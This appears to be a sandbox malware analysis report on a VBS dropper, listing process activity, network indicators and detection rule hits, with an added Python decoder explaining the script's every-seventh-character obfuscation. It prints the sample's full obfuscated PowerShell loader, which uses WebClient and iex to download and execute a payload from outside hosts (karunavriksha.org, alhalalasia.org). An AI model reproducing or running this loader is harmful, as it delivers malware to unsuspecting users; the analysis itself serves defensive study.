Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe 
l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gteaSpartl+ Besvr$Ov,rcoB,eboeleHornhiVI terpB infee
      Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6436, ProcessName: svchost.exe
      No Suricata rule has matched

      AV Detection

      Source: Blikvarefabrikken.vbs, Virustotal: Detection: 8%
      Source: Submitted Sample, Neural Call Log Analysis: 99.5%
      Source: unknown, HTTPS traffic detected: 146.88.26.238:443 -> 192.168.2.9:49683 version: TLS 1.2
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb> source: powershell.exe, 00000007.00000002.2116725870.0000000007E36000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2116725870.0000000007E36000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: m.Core.pdb# source: powershell.exe, 00000007.00000002.2106847629.0000000006D58000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

      Networking

      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
      Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: global traffic, HTTP traffic detected: GET /images/innocence.mso HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0, Host: karunavriksha.org, Connection: Keep-Alive
      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic, HTTP traffic detected: GET /images/innocence.mso HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0, Host: karunavriksha.org, Connection: Keep-Alive
      Source: global traffic, DNS traffic detected: DNS query: karunavriksha.org
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.o
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.or
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/s
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/se
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/sea
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/sear
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/searc
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/i
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/in
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/inn
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/inno
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/innoc
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/innoce
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/innocen
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/innocenc
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/innocence
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/innocence.
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/innocence.m
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/innocence.ms
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://alhalalasia.org/search/innocence.mso
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/innocence.msoP
Source: svchost.exe, 00000009.00000002.2339023640.0000019942800000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000009.00000003.1203845695.0000019942670000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80F8A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://karunavriksha.org
Source: powershell.exe, 00000004.00000002.1143648343.000001AF90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000041A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2081602385.00000000041A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB;r
Source: powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000009.00000003.1203845695.00000199426A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000009.00000003.1203845695.0000019942670000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.o
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.or
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/i
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/im
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/ima
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/imag
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/image
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/i
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/in
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/inn
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/inno
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/innoc
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/innoce
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/innocen
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/innocenc
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/innocence
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/innocence.
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/innocence.m
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/innocence.ms
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/innocence.mso
Source: powershell.exe, 00000004.00000002.1155363014.000001AFFE170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://karunavriksha.org/images/innocence.msolb
Source: powershell.exe, 00000004.00000002.1143648343.000001AF90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown | Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown | HTTPS traffic detected: 146.88.26.238:443 -> 192.168.2.9:49683 version: TLS 1.2

      System Summary

Source: amsi32_6456.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6560, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6456, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe 
l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A g
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe 
l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gJump to behavior
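The command line above is readable once the helper it defines is understood. The script builds the word `function:` piecewise, then uses `ni -p function: -n Emissionskursers` to define a function whose body starts at index 6 of its argument and keeps every 7th character (`$Modstillingens=6; ... $Modstillingens+=7`); every other character is filler. A second helper, `Meyers`, dot-sources `$Hjlpelsestes` on its argument. The decoder below is an added example written for this page, not code from the report or the sample. It replays that extraction in Python over six statements copied verbatim from the command line: `$Unlaboring` resolves to `Net.WEbcLIenT` (PowerShell type names are case-insensitive, so this is `System.Net.WebClient`), `$Splser` to `Mozilla/` (the start of the spoofed user agent), `$Tilbindes` to `Tls12`, `$Hjlpelsestes` to `ieX`, so `Meyers` is `. iex`, and `$Blokregistreringerne` to `>`, the separator between the two download URLs that appear in memory. The longer literals (user agent, URLs, the `$Xenon` type expression) contain doubled spaces that the rendered report has collapsed into single spaces, so they do not decode cleanly from the page as shown; run the decoder on the original script text for those.

```python
"""Decoder for the every-7th-character string obfuscation used by the
PowerShell stage launched from Blikvarefabrikken.vbs.

Added example; not part of the Joe Sandbox report and not the sample's
own code. The helper name Emissionskursers is the one the sample uses.
"""

import re


def emissionskursers(s: str, start: int = 6, step: int = 7) -> str:
    """Replay the script's helper: $i = 6; do { out += s[$i]; $i += 7 }
    until s[$i] falls outside the string."""
    return "".join(s[i] for i in range(start, len(s), step))


# Literal argument of one Emissionskursers call. PowerShell single-quoted
# strings escape a quote as ''.
LIT_RE = re.compile(r"Emissionskursers\s+'((?:[^']|'')*)'")

# Assignment statement that stores (or appends) a decoded literal.
ASSIGN_RE = re.compile(r"\$(\w+)\s*(\+?=)\s*Emissionskursers\s+'((?:[^']|'')*)'")


def decode_literals(script: str) -> list[str]:
    """Decode every Emissionskursers '...' literal in order of appearance."""
    return [emissionskursers(lit.replace("''", "'")) for lit in LIT_RE.findall(script)]


def resolve_assignments(script: str) -> dict[str, str]:
    """Replay `$Var=Emissionskursers '...'` and `$Var+=...` in order, so a
    value split across statements (Net.W + EbcLIenT) is reassembled."""
    env: dict[str, str] = {}
    for name, op, lit in ASSIGN_RE.findall(script):
        piece = emissionskursers(lit.replace("''", "'"))
        env[name] = (env.get(name, "") + piece) if op == "+=" else piece
    return env


# Constructed sample: six statements copied from the report's command line,
# chosen because their literals contain no doubled spaces and therefore
# survive the rendered page intact.
SAMPLE_FRAGMENT = ";".join([
    "$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW'",
    "$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT'",
    "$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/'",
    "$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2'",
    "$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX'",
    "$Blokregistreringerne=Emissionskursers ' Aari,>'",
])

if __name__ == "__main__":
    for name, value in resolve_assignments(SAMPLE_FRAGMENT).items():
        print(f"${name} = {value!r}")
```

Point the two regexes at a dump of the full command line (the report says it is 8124 characters) and `resolve_assignments` reconstructs the variable table the script builds before it calls `iex`; only strings assigned through the helper are handled, and any value produced by other means (such as the later `$Xenon` expression) has to be read off separately.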
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF9C1D0B5FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF9C1D0C3AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF9C1DD678D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF9C1DDBEDA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00B56F68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_08721B4F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0872647D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_087204F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0872048A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_087225A9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_08724E51
Source: Blikvarefabrikken.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 8124
Source: unknown | Process created: Commandline size = 8124
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 8124
